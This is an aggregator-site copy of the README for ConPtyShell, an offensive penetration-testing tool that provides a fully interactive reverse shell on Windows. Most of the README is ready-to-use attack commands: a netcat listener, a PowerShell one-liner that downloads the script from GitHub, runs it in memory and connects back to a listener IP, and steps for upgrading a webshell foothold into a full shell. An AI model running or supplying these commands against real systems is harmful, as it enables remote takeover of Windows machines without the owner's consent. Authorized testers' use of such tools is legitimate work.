GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → antonioCoco → Conptyshell

antonioCoco / Conptyshell

Licence: mit
ConPtyShell - Fully Interactive Reverse Shell for Windows

Programming Languages

shell
77523 projects
powershell
5483 projects
csharp
926 projects

Labels

terminalpenetration-testing

Projects that are alternatives of or similar to Conptyshell

Dnscat2 Powershell
A Powershell client for dnscat2, an encrypted DNS command and control tool.
Stars: ✭ 295 (-4.53%)
Mutual labels:  penetration-testing
Sonarsearch
A MongoDB importer and API for Project Sonars DNS datasets
Stars: ✭ 297 (-3.88%)
Mutual labels:  penetration-testing
Pastel
A command-line tool to generate, analyze, convert and manipulate colors
Stars: ✭ 3,742 (+1111%)
Mutual labels:  terminal
Reverse Shell Cheatsheet
🙃 Reverse Shell Cheat Sheet 🙃
Stars: ✭ 297 (-3.88%)
Mutual labels:  penetration-testing
Enigma Bbs
ENiGMA½ BBS Software
Stars: ✭ 294 (-4.85%)
Mutual labels:  terminal
Spotui
Spotify in the terminal 💻🎶
Stars: ✭ 302 (-2.27%)
Mutual labels:  terminal
Termimad
A library to display rich (Markdown) snippets and texts in a rust terminal application
Stars: ✭ 293 (-5.18%)
Mutual labels:  terminal
Termox
C++17 Terminal User Interface(TUI) Library.
Stars: ✭ 306 (-0.97%)
Mutual labels:  terminal
Hegemon
A modular system monitor written in Rust
Stars: ✭ 298 (-3.56%)
Mutual labels:  terminal
Fff
📁 A simple file manager written in bash.
Stars: ✭ 3,445 (+1014.89%)
Mutual labels:  terminal
Termplotlib
Plotting on the command line
Stars: ✭ 294 (-4.85%)
Mutual labels:  terminal
Tart
Tart - draw ASCII art in the terminal with your mouse!
Stars: ✭ 296 (-4.21%)
Mutual labels:  terminal
Terminal Icons
A PowerShell module to show file and folder icons in the terminal
Stars: ✭ 303 (-1.94%)
Mutual labels:  terminal
Csconsoleformat
.NET C# library for advanced formatting of console output [Apache]
Stars: ✭ 296 (-4.21%)
Mutual labels:  terminal
Has
✅ checks presence of various command line tools and their versions on the path
Stars: ✭ 309 (+0%)
Mutual labels:  terminal
Whirly
Colorful Terminal Spinner for Ruby 😀︎
Stars: ✭ 295 (-4.53%)
Mutual labels:  terminal
Webkiller
Tool Information Gathering Write By Python.
Stars: ✭ 300 (-2.91%)
Mutual labels:  penetration-testing
Hacklock
Hack Android Pattern From Termux With This Tool
Stars: ✭ 300 (-2.91%)
Mutual labels:  terminal
Hackdroid
Android Apps, Roms and Platforms for Pentesting
Stars: ✭ 310 (+0.32%)
Mutual labels:  penetration-testing
Ctf Notes
Everything needed for doing CTFs
Stars: ✭ 304 (-1.62%)
Mutual labels:  penetration-testing
View All Similar Projects ➔

ConPtyShell

ConPtyShell is a Fully Interactive Reverse Shell for Windows systems.

The introduction of the Pseudo Console (ConPty) in Windows has improved so much the way Windows handles terminals. ConPtyShell uses this feature to literally transform your bash in a remote powershell.

Briefly, it creates a Pseudo Console and attaches 2 pipes.
Then it creates the shell process (default powershell.exe) attaching the Pseudo Console with redirected input/output.
Then starts 2 Threads for Async I/O:
- one thread for reading from the socket and writing to Pseudo Console input pipe;
- the second thread for reading from the Pseudo Console output pipe and writing to the socket.

ConPtyShell has also the magic button "Upgrade to fully interactive" for your reverse shell, just use it as your needs :)

If you want to know further information regarding ConPty you can find a great article [1] in the references section.

NOTE: ConPtyShell uses the function CreatePseudoConsole(). This function is available since Windows 10 / Windows Server 2019 version 1809 (build 10.0.17763).

NOTE2: If the ConPTY is not available on the target system you will get a normal netcat-like interactive shell.

Requirements

Client Side: Windows version >= 10 / 2019 1809 (build >= 10.0.17763)

Server Side: any tcp listener, i.e. netcat

Usage

It's important to have the same rows and cols size between your terminal and the remote terminal if you want to have an aligned output on the shell.

Method 1

In this method the terminal size is set without you pass the rows and cols parameters to Invoke-ConPtyShell function:

Server Side:
stty raw -echo; (stty size; cat) | nc -lvnp 3001
Client Side:
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001

or, if you upload the ps1:

IEX(Get-Content .\Invoke-ConPtyShell.ps1 -Raw); Invoke-ConPtyShell 10.0.0.2 3001

Method 2

If you prefer to have more freedom on the tcp listener and your terminal you can proceed with a "Manual" way to get the reverse shell. In this case it's important that you set rows and cols size when calling the Invoke-ConPtyShell function:

Server Side:
stty size
nc -lvnp 3001
Wait For connection
ctrl+z
stty raw -echo
fg[ENTER]
Client Side:

Here you should use the values read from stty size command in the Parameters -Rows and -Cols

IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 24 -Cols 80

or, if you upload the ps1:

IEX(Get-Content .\Invoke-ConPtyShell.ps1 -Raw); Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 24 -Cols 80

Method 3 - Upgrade

You can also upgrade your current shell to a fully interecative shell. In this case it's important that you set rows and cols size when calling the Invoke-ConPtyShell function:

WARN1: Do not use Invoke-WebRequest if you load the assembly directly in powershell because ConPtyShell won't work properly when multiple sockets (and multiple \Device\Afd) are found in the current process

WARN2: Only sockets created with the flag WSA_FLAG_OVERLAPPED are compatible with the upgrade. Non overlapped sockets won't give a nice upgraded shell and it will have locks on I/O operations.

Server Side:
stty size
nc -lvnp 3001
Wait For connection
ctrl+z
stty raw -echo
fg[ENTER]
Client Side:

Here you should use the values read from stty size command in the Parameters -Rows and -Cols

IEX(Get-Content .\Invoke-ConPtyShell.ps1 -Raw); Invoke-ConPtyShell -Upgrade -Rows 24 -Cols 80

Change Console Size

In any case if you resize your terminal while you have already open the remote shell you can change the rows and cols size directly from powershell pasting the following code:

$width=80
$height=24
$Host.UI.RawUI.BufferSize = New-Object Management.Automation.Host.Size ($width, $height)
$Host.UI.RawUI.WindowSize = New-Object -TypeName System.Management.Automation.Host.Size -ArgumentList ($width, $height)

Demo

Below in the video you can watch a simulated scenario where on the left terminal i have a limited access to the server through a webshell and on the right i spawn a fully interactive reverse shell playing around:

Upgrade demo

References

  1. https://devblogs.microsoft.com/commandline/windows-command-line-introducing-the-windows-pseudo-console-conpty/
  2. https://github.com/microsoft/terminal
  3. https://www.usenix.org/conference/usenixsecurity20/presentation/niakanlahiji
  4. https://adepts.of0x.cc/shadowmove-hijack-socket/

Credits

  • LupMan
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].